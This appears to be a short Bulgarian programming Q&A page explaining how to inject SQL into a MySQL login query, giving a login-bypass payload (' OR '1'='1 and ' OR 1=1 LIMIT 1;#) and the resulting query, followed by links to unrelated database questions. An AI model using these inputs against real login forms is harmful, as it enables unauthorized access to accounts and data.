Mysql
 sql >> база данни >  >> RDS >> Mysql

как да инжектирате sql в процеса на влизане

Започвайки със заявката за цел:

SELECT   *
FROM     users
WHERE    username = '' OR '1'='1' 
AND      password = '' OR 1=1 LIMIT 1;#'

Получаваме потребителско име е ' OR '1'='1 и паролата е ' OR 1=1 LIMIT 1;#



  1. Database
  2.   
  3. Mysql
  4.   
  5. Oracle
  6.   
  7. Sqlserver
  8.   
  9. PostgreSQL
  10.   
  11. Access
  12.   
  13. SQLite
  14.   
  15. MariaDB
  1. Spring 3 MVC + MySQL:не може да съхранява символ €

  2. отказан достъп за потребител @ 'localhost' до база данни ''

  3. Мога ли да използвам Django F() обекти с конкатенация на низове?

  4. Кога да използвате MongoDB или други ориентирани към документи системи за бази данни?

  5. Неизвестна колона в списъка с полета